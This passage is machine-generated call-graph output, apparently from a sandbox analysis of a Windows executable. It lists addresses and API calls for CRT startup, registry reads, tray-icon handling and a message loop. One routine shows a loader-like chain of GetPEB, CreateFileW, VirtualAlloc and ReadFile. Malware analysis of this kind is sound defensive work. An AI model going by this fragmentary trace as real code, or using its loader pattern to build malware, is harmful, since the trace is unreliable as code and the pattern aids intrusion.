98242->98245 98246 9d5c60 98242->98246 98243->98236 98244->98247 98248 9cf2d9 __dosmaperr 20 API calls 98245->98248 98249 9cf2a3 __dosmaperr 20 API calls 98246->98249 98247->98204 98250 9d5c51 98248->98250 98249->98247 98251 9cf2c6 __dosmaperr 20 API calls 98250->98251 98251->98247 98252->98172 98253->98178 98254->98186 98255->98188 98256->98178 98257->98173 98258->98179 98259->98178 98260->98084 98262 9ce60f 98261->98262 98263 9ce624 98261->98263 98299 9cf2d9 20 API calls __dosmaperr 98262->98299 98265 9cdc0b 62 API calls 98263->98265 98268 9ce61f 98263->98268 98269 9ce638 98265->98269 98266 9ce614 98300 9d27ec 26 API calls _abort 98266->98300 98268->98086 98280 9d4d7a 98269->98280 98272 9cd955 __fread_nolock 26 API calls 98273 9ce646 98272->98273 98284 9d862f 98273->98284 98276 9d29c8 _free 20 API calls 98276->98268 98277->98081 98278->98088 98279->98088 98281 9ce640 98280->98281 98282 9d4d90 98280->98282 98281->98272 98282->98281 98283 9d29c8 _free 20 API calls 98282->98283 98283->98281 98285 9d863e 98284->98285 98288 9d8653 98284->98288 98304 9cf2c6 20 API calls __dosmaperr 98285->98304 98287 9d868e 98306 9cf2c6 20 API calls __dosmaperr 98287->98306 98288->98287 98293 9d867a 98288->98293 98290 9d8643 98305 9cf2d9 20 API calls __dosmaperr 98290->98305 98291 9d8693 98307 9cf2d9 20 API calls __dosmaperr 98291->98307 98301 9d8607 98293->98301 98296 9d869b 98308 9d27ec 26 API calls _abort 98296->98308 98297 9ce64c 98297->98268 98297->98276 98299->98266 98300->98268 98309 9d8585 98301->98309 98303 9d862b 98303->98297 98304->98290 98305->98297 98306->98291 98307->98296 98308->98297 98310 9d8591 __FrameHandler3::FrameUnwindToState 98309->98310 98320 9d5147 EnterCriticalSection 98310->98320 98312 9d859f 98313 9d85c6 98312->98313 98314 9d85d1 98312->98314 98321 9d86ae 98313->98321 98336 9cf2d9 20 API calls __dosmaperr 98314->98336 98317 9d85cc 98337 9d85fb LeaveCriticalSection __wsopen_s 98317->98337 98319 9d85ee __wsopen_s 98319->98303 98320->98312 98338 9d53c4 98321->98338 98323 9d86be 98324 9d86c4 98323->98324 98326 9d86f6 98323->98326 98328 9d53c4 __wsopen_s 26 API calls 98323->98328 98351 9d5333 21 API calls 2 library calls 98324->98351 98326->98324 98329 9d53c4 __wsopen_s 26 API calls 98326->98329 98327 9d871c 98331 9d873e 98327->98331 98352 9cf2a3 20 API calls __dosmaperr 98327->98352 98332 9d86ed 98328->98332 98330 9d8702 CloseHandle 98329->98330 98330->98324 98333 9d870e GetLastError 98330->98333 98331->98317 98335 9d53c4 __wsopen_s 26 API calls 98332->98335 98333->98324 98335->98326 98336->98317 98337->98319 98339 9d53e6 98338->98339 98340 9d53d1 98338->98340 98342 9cf2c6 __dosmaperr 20 API calls 98339->98342 98346 9d540b 98339->98346 98341 9cf2c6 __dosmaperr 20 API calls 98340->98341 98343 9d53d6 98341->98343 98344 9d5416 98342->98344 98345 9cf2d9 __dosmaperr 20 API calls 98343->98345 98347 9cf2d9 __dosmaperr 20 API calls 98344->98347 98349 9d53de 98345->98349 98346->98323 98348 9d541e 98347->98348 98350 9d27ec _abort 26 API calls 98348->98350 98349->98323 98350->98349 98351->98327 98352->98331 98353->97886 98354->97518 98384 9a6270 98355->98384 98357 9a9fd2 98390 9aa4a1 22 API calls __fread_nolock 98357->98390 98359 9a9fec 98359->97533 98362 9ef7c4 98395 a096e2 84 API calls __wsopen_s 98362->98395 98363 9ef699 98370 9bfddb 22 API calls 98363->98370 98364 9aa405 98364->98359 98397 a096e2 84 API calls __wsopen_s 98364->98397 98365 9aa4a1 22 API calls 98382 9a9eb5 98365->98382 98369 9aa6c3 22 API calls 98369->98382 98373 9ef754 98370->98373 98371 9ef7d2 98396 9aa4a1 22 API calls __fread_nolock 98371->98396 98375 9bfe0b 22 API calls 98373->98375 98374 9ef7e8 98374->98359 98376 9aa12c __fread_nolock 98375->98376 98376->98362 98376->98364 98378 9aa587 22 API calls 98378->98382 98379 9aaec9 22 API calls 98380 9aa0db CharUpperBuffW 98379->98380 98391 9aa673 22 API calls 98380->98391 98382->98357 98382->98362 98382->98363 98382->98364 98382->98365 98382->98369 98382->98376 98382->98378 98382->98379 98389 9a4573 41 API calls _wcslen 98382->98389 98392 9a48c8 23 API calls 98382->98392 98393 9a49bd 22 API calls __fread_nolock 98382->98393 98394 9aa673 22 API calls 98382->98394 98383->97536 98385 9bfe0b 22 API calls 98384->98385 98386 9a6295 98385->98386 98387 9bfddb 22 API calls 98386->98387 98388 9a62a3 98387->98388 98388->98382 98389->98382 98390->98359 98391->98382 98392->98382 98393->98382 98394->98382 98395->98371 98396->98374 98397->98359 98398->97379 98399 9c03fb 98400 9c0407 __FrameHandler3::FrameUnwindToState 98399->98400 98428 9bfeb1 98400->98428 98402 9c040e 98403 9c0561 98402->98403 98406 9c0438 98402->98406 98455 9c083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98403->98455 98405 9c0568 98456 9c4e52 28 API calls _abort 98405->98456 98417 9c0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98406->98417 98439 9d247d 98406->98439 98408 9c056e 98457 9c4e04 28 API calls _abort 98408->98457 98412 9c0576 98413 9c0457 98415 9c04d8 98447 9c0959 98415->98447 98417->98415 98451 9c4e1a 38 API calls 3 library calls 98417->98451 98419 9c04de 98420 9c04f3 98419->98420 98452 9c0992 GetModuleHandleW 98420->98452 98422 9c04fa 98422->98405 98423 9c04fe 98422->98423 98424 9c0507 98423->98424 98453 9c4df5 28 API calls _abort 98423->98453 98454 9c0040 13 API calls 2 library calls 98424->98454 98427 9c050f 98427->98413 98429 9bfeba 98428->98429 98458 9c0698 IsProcessorFeaturePresent 98429->98458 98431 9bfec6 98459 9c2c94 10 API calls 3 library calls 98431->98459 98433 9bfecb 98438 9bfecf 98433->98438 98460 9d2317 98433->98460 98436 9bfee6 98436->98402 98438->98402 98441 9d2494 98439->98441 98440 9c0a8c _ValidateLocalCookies 5 API calls 98442 9c0451 98440->98442 98441->98440 98442->98413 98443 9d2421 98442->98443 98444 9d2450 98443->98444 98445 9c0a8c _ValidateLocalCookies 5 API calls 98444->98445 98446 9d2479 98445->98446 98446->98417 98476 9c2340 98447->98476 98450 9c097f 98450->98419 98451->98415 98452->98422 98453->98424 98454->98427 98455->98405 98456->98408 98457->98412 98458->98431 98459->98433 98464 9dd1f6 98460->98464 98463 9c2cbd 8 API calls 3 library calls 98463->98438 98467 9dd20f 98464->98467 98466 9bfed8 98466->98436 98466->98463 98468 9c0a8c 98467->98468 98469 9c0a95 98468->98469 98470 9c0a97 IsProcessorFeaturePresent 98468->98470 98469->98466 98472 9c0c5d 98470->98472 98475 9c0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98472->98475 98474 9c0d40 98474->98466 98475->98474 98477 9c096c GetStartupInfoW 98476->98477 98477->98450 98478 9a1033 98483 9a4c91 98478->98483 98482 9a1042 98484 9aa961 22 API calls 98483->98484 98485 9a4cff 98484->98485 98492 9a3af0 98485->98492 98487 9e3cb6 98489 9a4d9c 98489->98487 98490 9a1038 98489->98490 98495 9a51f7 22 API calls __fread_nolock 98489->98495 98491 9c00a3 29 API calls __onexit 98490->98491 98491->98482 98496 9a3b1c 98492->98496 98495->98489 98497 9a3b0f 98496->98497 98498 9a3b29 98496->98498 98497->98489 98498->98497 98499 9a3b30 RegOpenKeyExW 98498->98499 98499->98497 98500 9a3b4a RegQueryValueExW 98499->98500 98501 9a3b6b 98500->98501 98502 9a3b80 RegCloseKey 98500->98502 98501->98502 98502->98497 98503 9f3f75 98514 9bceb1 98503->98514 98505 9f3f8b 98506 9f4006 98505->98506 98581 9be300 23 API calls 98505->98581 98523 9abf40 98506->98523 98509 9f3fe6 98510 9f4052 98509->98510 98582 a11abf 22 API calls 98509->98582 98512 9f4a88 98510->98512 98583 a1359c 82 API calls __wsopen_s 98510->98583 98515 9bcebf 98514->98515 98516 9bced2 98514->98516 98517 9aaceb 23 API calls 98515->98517 98518 9bced7 98516->98518 98519 9bcf05 98516->98519 98522 9bcec9 98517->98522 98521 9bfddb 22 API calls 98518->98521 98520 9aaceb 23 API calls 98519->98520 98520->98522 98521->98522 98522->98505 98584 9aadf0 98523->98584 98525 9abf9d 98526 9abfa9 98525->98526 98527 9f04b6 98525->98527 98528 9ac01e 98526->98528 98530 9f04c6 98526->98530 98612 a1359c 82 API calls __wsopen_s 98527->98612 98589 9aac91 98528->98589 98613 a1359c 82 API calls __wsopen_s 98530->98613 98533 a07120 22 API calls 98578 9ac039 __fread_nolock messages 98533->98578 98534 9ac7da 98538 9bfe0b 22 API calls 98534->98538 98543 9ac808 __fread_nolock 98538->98543 98540 9f04f5 98544 9f055a 98540->98544 98614 9bd217 235 API calls 98540->98614 98547 9bfe0b 22 API calls 98543->98547 98566 9ac603 98544->98566 98615 a1359c 82 API calls __wsopen_s 98544->98615 98545 9aaf8a 22 API calls 98545->98578 98546 9f091a 98624 a13209 23 API calls 98546->98624 98579 9ac350 __fread_nolock messages 98547->98579 98549 9bfddb 22 API calls 98549->98578 98551 9aec40 235 API calls 98551->98578 98552 9f08a5 98553 9aec40 235 API calls 98552->98553 98555 9f08cf 98553->98555 98555->98566 98622 9aa81b 41 API calls 98555->98622 98556 9f0591 98616 a1359c 82 API calls __wsopen_s 98556->98616 98559 9f08f6 98623 a1359c 82 API calls __wsopen_s 98559->98623 98562 9ac237 98564 9ac253 98562->98564 98565 9aa8c7 22 API calls 98562->98565 98563 9aaceb 23 API calls 98563->98578 98568 9f0976 98564->98568 98572 9ac297 messages 98564->98572 98565->98564 98566->98510 98567 9bfe0b 22 API calls 98567->98578 98570 9aaceb 23 API calls 98568->98570 98571 9f09bf 98570->98571 98571->98566 98625 a1359c 82 API calls __wsopen_s 98571->98625 98572->98571 98573 9aaceb 23 API calls 98572->98573 98574 9ac335 98573->98574 98574->98571 98575 9ac342 98574->98575 98600 9aa704 98575->98600 98576 9abbe0 40 API calls 98576->98578 98578->98533 98578->98534 98578->98540 98578->98543 98578->98544 98578->98545 98578->98546 98578->98549 98578->98551 98578->98552 98578->98556 98578->98559 98578->98562 98578->98563 98578->98566 98578->98567 98578->98571 98578->98576 98593 9aad81 98578->98593 98617 a07099 22 API calls __fread_nolock 98578->98617 98618 a25745 54 API calls _wcslen 98578->98618 98619 9baa42 22 API calls messages 98578->98619 98620 a0f05c 40 API calls 98578->98620 98621 9aa993 41 API calls 98578->98621 98580 9ac3ac 98579->98580 98611 9bce17 22 API calls messages 98579->98611 98580->98510 98581->98509 98582->98506 98583->98512 98585 9aae01 98584->98585 98588 9aae1c messages 98584->98588 98586 9aaec9 22 API calls 98585->98586 98587 9aae09 CharUpperBuffW 98586->98587 98587->98588 98588->98525 98591 9aacae 98589->98591 98590 9aacd1 98590->98578 98591->98590 98626 a1359c 82 API calls __wsopen_s 98591->98626 98594 9efadb 98593->98594 98595 9aad92 98593->98595 98596 9bfddb 22 API calls 98595->98596 98597 9aad99 98596->98597 98627 9aadcd 98597->98627 98601 9ef86f 98600->98601 98602 9aa718 98600->98602 98603 9ef87f 98601->98603 98646 a04d4a 22 API calls messages 98601->98646 98605 9aa746 98602->98605 98606 9aaf8a 22 API calls 98602->98606 98610 9aa763 messages 98602->98610 98607 9aa74c 98605->98607 98634 9aaf8a 98605->98634 98606->98605 98607->98610 98642 9ab090 98607->98642 98610->98579 98611->98579 98612->98530 98613->98566 98614->98544 98615->98566 98616->98566 98617->98578 98618->98578 98619->98578 98620->98578 98621->98578 98622->98559 98623->98566 98624->98562 98625->98566 98626->98590 98631 9aaddd 98627->98631 98628 9aadb6 98628->98578 98629 9bfddb 22 API calls 98629->98631 98630 9aa961 22 API calls 98630->98631 98631->98628 98631->98629 98631->98630 98632 9aa8c7 22 API calls 98631->98632 98633 9aadcd 22 API calls 98631->98633 98632->98631 98633->98631 98635 9aaf98 98634->98635 98641 9aafc0 messages 98634->98641 98636 9aafa6 98635->98636 98637 9aaf8a 22 API calls 98635->98637 98638 9aafac 98636->98638 98639 9aaf8a 22 API calls 98636->98639 98637->98636 98640 9ab090 22 API calls 98638->98640 98638->98641 98639->98638 98640->98641 98641->98607 98643 9ab09b messages 98642->98643 98645 9ab0d6 messages 98643->98645 98647 9bce17 22 API calls messages 98643->98647 98645->98610 98646->98603 98647->98645 98648 9a3156 98651 9a3170 98648->98651 98652 9a3187 98651->98652 98653 9a31eb 98652->98653 98654 9a318c 98652->98654 98691 9a31e9 98652->98691 98658 9e2dfb 98653->98658 98659 9a31f1 98653->98659 98655 9a3199 98654->98655 98656 9a3265 PostQuitMessage 98654->98656 98663 9e2e7c 98655->98663 98664 9a31a4 98655->98664 98665 9a316a 98656->98665 98657 9a31d0 DefWindowProcW 98657->98665 98707 9a18e2 10 API calls 98658->98707 98660 9a31f8 98659->98660 98661 9a321d SetTimer RegisterWindowMessageW 98659->98661 98666 9e2d9c 98660->98666 98667 9a3201 KillTimer 98660->98667 98661->98665 98669 9a3246 CreatePopupMenu 98661->98669 98712 a0bf30 34 API calls ___scrt_fastfail 98663->98712 98670 9a31ae 98664->98670 98671 9e2e68 98664->98671 98679 9e2dd7 MoveWindow 98666->98679 98680 9e2da1 98666->98680 98703 9a30f2 Shell_NotifyIconW ___scrt_fastfail 98667->98703 98668 9e2e1c 98708 9be499 42 API calls 98668->98708 98669->98665 98676 9e2e4d 98670->98676 98677 9a31b9 98670->98677 98696 a0c161 98671->98696 98676->98657 98711 a00ad7 22 API calls 98676->98711 98682 9a31c4 98677->98682 98683 9a3253 98677->98683 98678 9e2e8e 98678->98657 98678->98665 98679->98665 98684 9e2dc6 SetFocus 98680->98684 98685 9e2da7 98680->98685 98681 9a3214 98704 9a3c50 DeleteObject DestroyWindow 98681->98704 98682->98657 98709 9a30f2 Shell_NotifyIconW ___scrt_fastfail 98682->98709 98705 9a326f 44 API calls ___scrt_fastfail 98683->98705 98684->98665 98685->98682 98689 9e2db0 98685->98689 98706 9a18e2 10 API calls 98689->98706 98691->98657 98692 9a3263 98692->98665 98694 9e2e41 98710 9a3837 49 API calls ___scrt_fastfail 98694->98710 98697 a0c276 98696->98697 98698 a0c179 ___scrt_fastfail 98696->98698 98697->98665 98713 9a3923 98698->98713 98700 a0c25f KillTimer SetTimer 98700->98697 98701 a0c1a0 98701->98700 98702 a0c251 Shell_NotifyIconW 98701->98702 98702->98700 98703->98681 98704->98665 98705->98692 98706->98665 98707->98668 98708->98682 98709->98694 98710->98691 98711->98691 98712->98678 98714 9a393f 98713->98714 98715 9a3a13 98713->98715 98716 9a6270 22 API calls 98714->98716 98715->98701 98717 9a394d 98716->98717 98718 9a395a 98717->98718 98719 9e3393 LoadStringW 98717->98719 98720 9a6b57 22 API calls 98718->98720 98721 9e33ad 98719->98721 98722 9a396f 98720->98722 98725 9aa8c7 22 API calls 98721->98725 98729 9a3994 ___scrt_fastfail 98721->98729 98723 9a397c 98722->98723 98724 9e33c9 98722->98724 98723->98721 98726 9a3986 98723->98726 98727 9a6350 22 API calls 98724->98727 98725->98729 98728 9a6350 22 API calls 98726->98728 98730 9e33d7 98727->98730 98728->98729 98732 9a39f9 Shell_NotifyIconW 98729->98732 98730->98729 98731 9a33c6 22 API calls 98730->98731 98733 9e33f9 98731->98733 98732->98715 98734 9a33c6 22 API calls 98733->98734 98734->98729 98735 9a2e37 98736 9aa961 22 API calls 98735->98736 98737 9a2e4d 98736->98737 98814 9a4ae3 98737->98814 98739 9a2e6b 98740 9a3a5a 24 API calls 98739->98740 98741 9a2e7f 98740->98741 98742 9a9cb3 22 API calls 98741->98742 98743 9a2e8c 98742->98743 98744 9a4ecb 94 API calls 98743->98744 98745 9a2ea5 98744->98745 98746 9a2ead 98745->98746 98747 9e2cb0 98745->98747 98751 9aa8c7 22 API calls 98746->98751 98844 a12cf9 98747->98844 98749 9e2cc3 98750 9e2ccf 98749->98750 98752 9a4f39 68 API calls 98749->98752 98755 9a4f39 68 API calls 98750->98755 98753 9a2ec3 98751->98753 98752->98750 98828 9a6f88 22 API calls 98753->98828 98758 9e2ce5 98755->98758 98756 9a2ecf 98757 9a9cb3 22 API calls 98756->98757 98759 9a2edc 98757->98759 98870 9a3084 22 API calls 98758->98870 98829 9aa81b 41 API calls 98759->98829 98761 9a2eec 98764 9a9cb3 22 API calls 98761->98764 98763 9e2d02 98871 9a3084 22 API calls 98763->98871 98766 9a2f12 98764->98766 98830 9aa81b 41 API calls 98766->98830 98767 9e2d1e 98769 9a3a5a 24 API calls 98767->98769 98770 9e2d44 98769->98770 98872 9a3084 22 API calls 98770->98872 98771 9a2f21 98774 9aa961 22 API calls 98771->98774 98773 9e2d50 98775 9aa8c7 22 API calls 98773->98775 98776 9a2f3f 98774->98776 98778 9e2d5e 98775->98778 98831 9a3084 22 API calls 98776->98831 98873 9a3084 22 API calls 98778->98873 98779 9a2f4b 98832 9c4a28 40 API calls 3 library calls 98779->98832 98782 9e2d6d 98785 9aa8c7 22 API calls 98782->98785 98783 9a2f59 98783->98758 98784 9a2f63 98783->98784 98833 9c4a28 40 API calls 3 library calls 98784->98833 98787 9e2d83 98785->98787 98874 9a3084 22 API calls 98787->98874 98788 9a2f6e 98788->98763 98790 9a2f78 98788->98790 98834 9c4a28 40 API calls 3 library calls 98790->98834 98791 9e2d90 98793 9a2f83 98793->98767 98794 9a2f8d 98793->98794 98835 9c4a28 40 API calls 3 library calls 98794->98835 98796 9a2f98 98797 9a2fdc 98796->98797 98836 9a3084 22 API calls 98796->98836 98797->98782 98798 9a2fe8 98797->98798 98798->98791 98838 9a63eb 22 API calls 98798->98838 98800 9a2fbf 98802 9aa8c7 22 API calls 98800->98802 98804 9a2fcd 98802->98804 98803 9a2ff8 98839 9a6a50 22 API calls 98803->98839 98837 9a3084 22 API calls 98804->98837 98807 9a3006 98840 9a70b0 23 API calls 98807->98840 98811 9a3021 98812 9a3065 98811->98812 98841 9a6f88 22 API calls 98811->98841 98842 9a70b0 23 API calls 98811->98842 98843 9a3084 22 API calls 98811->98843 98815 9a4af0 __wsopen_s 98814->98815 98816 9a6b57 22 API calls 98815->98816 98817 9a4b22 98815->98817 98816->98817 98818 9a4c6d 22 API calls 98817->98818 98819 9a4b58 98817->98819 98818->98817 98820 9a4c29 98819->98820 98822 9a9cb3 22 API calls 98819->98822 98826 9a4c6d 22 API calls 98819->98826 98827 9a515f 22 API calls 98819->98827 98821 9a9cb3 22 API calls 98820->98821 98824 9a4c5e 98820->98824 98823 9a4c52 98821->98823 98822->98819 98825 9a515f 22 API calls 98823->98825 98824->98739 98825->98824 98826->98819 98827->98819 98828->98756 98829->98761 98830->98771 98831->98779 98832->98783 98833->98788 98834->98793 98835->98796 98836->98800 98837->98797 98838->98803 98839->98807 98840->98811 98841->98811 98842->98811 98843->98811 98845 a12d15 98844->98845 98846 9a511f 64 API calls 98845->98846 98847 a12d29 98846->98847 98848 a12e66 75 API calls 98847->98848 98849 a12d3b 98848->98849 98850 a12d3f 98849->98850 98851 9a50f5 40 API calls 98849->98851 98850->98749 98852 a12d56 98851->98852 98853 9a50f5 40 API calls 98852->98853 98854 a12d66 98853->98854 98855 9a50f5 40 API calls 98854->98855 98856 a12d81 98855->98856 98857 9a50f5 40 API calls 98856->98857 98858 a12d9c 98857->98858 98859 9a511f 64 API calls 98858->98859 98860 a12db3 98859->98860 98861 9cea0c ___std_exception_copy 21 API calls 98860->98861 98862 a12dba 98861->98862 98863 9cea0c ___std_exception_copy 21 API calls 98862->98863 98864 a12dc4 98863->98864 98865 9a50f5 40 API calls 98864->98865 98866 a12dd8 98865->98866 98867 a128fe 27 API calls 98866->98867 98868 a12dee 98867->98868 98868->98850 98875 a122ce 79 API calls 98868->98875 98870->98763 98871->98767 98872->98773 98873->98782 98874->98791 98875->98850 98876 9a1cad SystemParametersInfoW 98877 e153b8 98878 e13008 GetPEB 98877->98878 98879 e1545d 98878->98879 98891 e152a8 98879->98891 98881 e15486 CreateFileW 98883 e154d5 98881->98883 98884 e154da 98881->98884 98884->98883 98885 e154f1 VirtualAlloc 98884->98885 98885->98883 98886 e1550f ReadFile 98885->98886 98886->98883 98887 e1552a 98886->98887 98888 e142a8 13 API calls 98887->98888 98889 e1555d 98888->98889 98890 e15580 ExitProcess 98889->98890 98890->98883 98892 e152b1 Sleep 98891->98892 98893 e152bf 98892->98893 98894 9a2de3 98895 9a2df0 __wsopen_s 98894->98895 98896 9a2e09 98895->98896 98897 9e2c2b ___scrt_fastfail 98895->98897 98898 9a3aa2 23 API calls 98896->98898 98899 9e2c47 GetOpenFileNameW 98897->98899 98900 9a2e12 98898->98900 98901 9e2c96 98899->98901 98910 9a2da5 98900->98910 98903 9a6b57 22 API calls 98901->98903 98905 9e2cab 98903->98905 98905->98905 98907 9a2e27 98928 9a44a8 98907->98928 98911 9e1f50 __wsopen_s 98910->98911 98912 9a2db2 GetLongPathNameW 98911->98912 98913 9a6b57 22 API calls 98912->98913 98914 9a2dda 98913->98914 98915 9a3598 98914->98915 98916 9aa961 22 API calls 98915->98916 98917 9a35aa 98916->98917 98918 9a3aa2 23 API calls 98917->98918 98919 9a35b5 98918->98919 98920 9e32eb 98919->98920 98921 9a35c0 98919->98921 98925 9e330d 98920->98925 98964 9bce60 41 API calls 98920->98964 98923 9a515f 22 API calls 98921->98923 98924 9a35cc 98923->98924 98958 9a35f3 98924->98958 98927 9a35df 98927->98907 98929 9a4ecb 94 API calls 98928->98929 98930 9a44cd 98929->98930 98931 9e3833 98930->98931 98933 9a4ecb 94 API calls 98930->98933 98932 a12cf9 80 API calls 98931->98932 98934 9e3848 98932->98934 98935 9a44e1 98933->98935 98936 9e384c 98934->98936 98937 9e3869 98934->98937 98935->98931 98938 9a44e9 98935->98938 98939 9a4f39 68 API calls 98936->98939 98940 9bfe0b 22 API calls 98937->98940 98941 9e3854 98938->98941 98942 9a44f5 98938->98942 98939->98941 98957 9e38ae 98940->98957 98966 a0da5a 82 API calls 98941->98966 98965 9a940c 136 API calls 2 library calls 98942->98965 98945 9a2e31 98946 9e3862 98946->98937 98947 9e3a5f 98952 9e3a67 98947->98952 98948 9a4f39 68 API calls 98948->98952 98952->98948 98972 a0989b 82 API calls __wsopen_s 98952->98972 98954 9a9cb3 22 API calls 98954->98957 98957->98947 98957->98952 98957->98954 98967 a0967e 22 API calls __fread_nolock 98957->98967 98968 a095ad 42 API calls _wcslen 98957->98968 98969 a10b5a 22 API calls 98957->98969 98970 9aa4a1 22 API calls __fread_nolock 98957->98970 98971 9a3ff7 22 API calls 98957->98971 98959 9a3605 98958->98959 98963 9a3624 __fread_nolock 98958->98963 98961 9bfe0b 22 API calls 98959->98961 98960 9bfddb 22 API calls 98962 9a363b 98960->98962 98961->98963 98962->98927 98963->98960 98964->98920 98965->98945 98966->98946 98967->98957 98968->98957 98969->98957 98970->98957 98971->98957 98972->98952 98973 9e2ba5 98974 9e2baf 98973->98974 98975 9a2b25 98973->98975 98976 9a3a5a 24 API calls 98974->98976 99001 9a2b83 7 API calls 98975->99001 98978 9e2bb8 98976->98978 98981 9a9cb3 22 API calls 98978->98981 98983 9e2bc6 98981->98983 98982 9a2b2f 98991 9a2b44 98982->98991 99005 9a3837 49 API calls ___scrt_fastfail 98982->99005 98984 9e2bce 98983->98984 98985 9e2bf5 98983->98985 98987 9a33c6 22 API calls 98984->98987 98988 9a33c6 22 API calls 98985->98988 98989 9e2bd9 98987->98989 98990 9e2bf1 GetForegroundWindow ShellExecuteW 98988->98990 98993 9a6350 22 API calls 98989->98993 98997 9e2c26 98990->98997 98992 9a2b5f 98991->98992 99006 9a30f2 Shell_NotifyIconW ___scrt_fastfail 98991->99006 98999 9a2b66 SetCurrentDirectoryW 98992->98999 98996 9e2be7 98993->98996 98998 9a33c6 22 API calls 98996->98998 98997->98992 98998->98990 99000 9a2b7a 98999->99000 99007 9a2cd4 7 API calls 99001->99007 99003 9a2b2a 99004 9a2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99003->99004 99004->98982 99005->98991 99006->98992 99007->99003 99008 9a1044 99013 9a10f3 99008->99013 99010 9a104a 99049 9c00a3 29 API calls __onexit 99010->99049 99012 9a1054 99050 9a1398 99013->99050 99017 9a116a 99018 9aa961 22 API calls 99017->99018 99019 9a1174 99018->99019 99020 9aa961 22 API calls 99019->99020 99021 9a117e 99020->99021 99022 9aa961 22 API calls 99021->99022 99023 9a1188 99022->99023 99024 9aa961 22 API calls 99023->99024 99025 9a11c6 99024->99025 99026 9aa961 22 API calls 99025->99026 99027 9a1292 99026->99027 99060 9a171c 99027->99060 99031 9a12c4 99032 9aa961 22 API calls 99031->99032 99033 9a12ce 99032->99033 99034 9b1940 9 API calls 99033->99034 99035 9a12f9 99034->99035 99081 9a1aab 99035->99081 99037 9a1315 99038 9a1325 GetStdHandle 99037->99038 99039 9a137a 99038->99039 99040 9e2485 99038->99040 99043 9a1387 OleInitialize 99039->99043 99040->99039 99041 9e248e 99040->99041 99042 9bfddb 22 API calls 99041->99042 99044 9e2495 99042->99044 99043->99010 99088 a1011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99044->99088 99046 9e249e 99089 a10944 CreateThread 99046->99089 99048 9e24aa CloseHandle 99048->99039 99049->99012 99090 9a13f1 99050->99090 99053 9a13f1 22 API calls 99054 9a13d0 99053->99054 99055 9aa961 22 API calls 99054->99055 99056 9a13dc 99055->99056 99057 9a6b57 22 API calls 99056->99057 99058 9a1129 99057->99058 99059 9a1bc3 6 API calls 99058->99059 99059->99017 99061 9aa961 22 API calls 99060->99061 99062 9a172c 99061->99062 99063 9aa961 22 API calls 99062->99063 99064 9a1734 99063->99064 99065 9aa961 22 API calls 99064->99065 99066 9a174f 99065->99066 99067 9bfddb 22 API calls 99066->99067 99068 9a129c 99067->99068 99069 9a1b4a 99068->99069 99070 9a1b58 99069->99070 99071 9aa961 22 API calls 99070->99071 99072 9a1b63 99071->99072 99073 9aa961 22 API calls 99072->99073 99074 9a1b6e 99073->99074 99075 9aa961 22 API calls 99074->99075 99076 9a1b79 99075->99076 99077 9aa961 22 API calls 99076->99077 99078 9a1b84 99077->99078 99079 9bfddb 22 API calls 99078->99079 99080 9a1b96 RegisterWindowMessageW 99079->99080 99080->99031 99082 9a1abb 99081->99082 99083 9e272d 99081->99083 99084 9bfddb 22 API calls 99082->99084 99097 a13209 23 API calls 99083->99097 99087 9a1ac3 99084->99087 99086 9e2738 99087->99037 99088->99046 99089->99048 99098 a1092a 28 API calls 99089->99098 99091 9aa961 22 API calls 99090->99091 99092 9a13fc 99091->99092 99093 9aa961 22 API calls 99092->99093 99094 9a1404 99093->99094 99095 9aa961 22 API calls 99094->99095 99096 9a13c6 99095->99096 99096->99053 99097->99086 99099 9f3a41 99103 a110c0 99099->99103 99101 9f3a4c 99102 a110c0 53 API calls 99101->99102 99102->99101 99104 a110cd 99103->99104 99110 a110fa 99103->99110 99105 a110fc 99104->99105 99106 a11101 99104->99106 99104->99110 99112 a110f4 99104->99112 99115 9bfa11 53 API calls 99105->99115 99108 9a7510 53 API calls 99106->99108 99109 a11108 99108->99109 99111 9a6350 22 API calls 99109->99111 99110->99101 99111->99110 99114 9ab270 39 API calls 99112->99114 99114->99110 99115->99106 99116 9f2a00 99130 9ad7b0 messages 99116->99130 99117 9adb11 PeekMessageW 99117->99130 99118 9ad807 GetInputState 99118->99117 99118->99130 99120 9f1cbe TranslateAcceleratorW 99120->99130 99121 9ada04 timeGetTime 99121->99130 99122 9adb8f PeekMessageW 99122->99130 99123 9adb73 TranslateMessage DispatchMessageW 99123->99122 99124 9adbaf Sleep 99138 9adbc0 99124->99138 99125 9f2b74 Sleep 99125->99138 99126 9be551 timeGetTime 99126->99138 99127 9f1dda timeGetTime 99182 9be300 23 API calls 99127->99182 99130->99117 99130->99118 99130->99120 99130->99121 99130->99122 99130->99123 99130->99124 99130->99125 99130->99127 99133 9ad9d5 99130->99133 99144 9aec40 235 API calls 99130->99144 99145 9b1310 235 API calls 99130->99145 99146 9abf40 235 API calls 99130->99146 99148 9adfd0 99130->99148 99176 9bedf6 99130->99176 99181 9add50 235 API calls 99130->99181 99183 a13a2a 23 API calls 99130->99183 99184 a1359c 82 API calls __wsopen_s 99130->99184 99131 9f2c0b GetExitCodeProcess 99136 9f2c37 CloseHandle 99131->99136 99137 9f2c21 WaitForSingleObject 99131->99137 99132 9f2a31 99132->99133 99134 a329bf GetForegroundWindow 99134->99138 99136->99138 99137->99130 99137->99136 99138->99126 99138->99130 99138->99131 99138->99132 99138->99133 99138->99134 99139 9f2ca9 Sleep 99138->99139 99185 a25658 23 API calls 99138->99185 99186 a0e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99138->99186 99187 a0d4dc 47 API calls 99138->99187 99139->99130 99144->99130 99145->99130 99146->99130 99150 9ae010 99148->99150 99149 9f2f7a 99151 9aec40 235 API calls 99149->99151 99150->99149 99153 9ae075 99150->99153 99152 9f2f8c 99151->99152 99168 9ae0dc messages 99152->99168 99190 a1359c 82 API calls __wsopen_s 99152->99190 99153->99168 99191 9c0242 5 API calls __Init_thread_wait 99153->99191 99157 9f2fca 99159 9aa961 22 API calls 99157->99159 99157->99168 99158 9aa961 22 API calls 99158->99168 99161 9f2fe4 99159->99161 99192 9c00a3 29 API calls __onexit 99161->99192 99165 9f2fee 99193 9c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99165->99193 99168->99158 99169 9aa8c7 22 API calls 99168->99169 99170 9aec40 235 API calls 